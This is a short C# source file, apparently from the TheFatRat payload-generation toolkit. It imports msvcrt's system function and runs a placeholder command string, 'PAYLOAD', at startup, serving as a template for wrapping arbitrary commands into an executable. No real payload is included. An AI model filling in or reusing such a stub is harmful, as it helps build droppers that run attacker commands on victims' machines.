TheFatRat/tools/prog.cs

15 lines
225 B
C#

// C#
using System.Runtime.InteropServices;
namespace pshcmd
{
public class CMD
{
[DllImport("msvcrt.dll")]
public static extern int system(string cmd);
public static void Main()
{
system("PAYLOAD");
}
}
}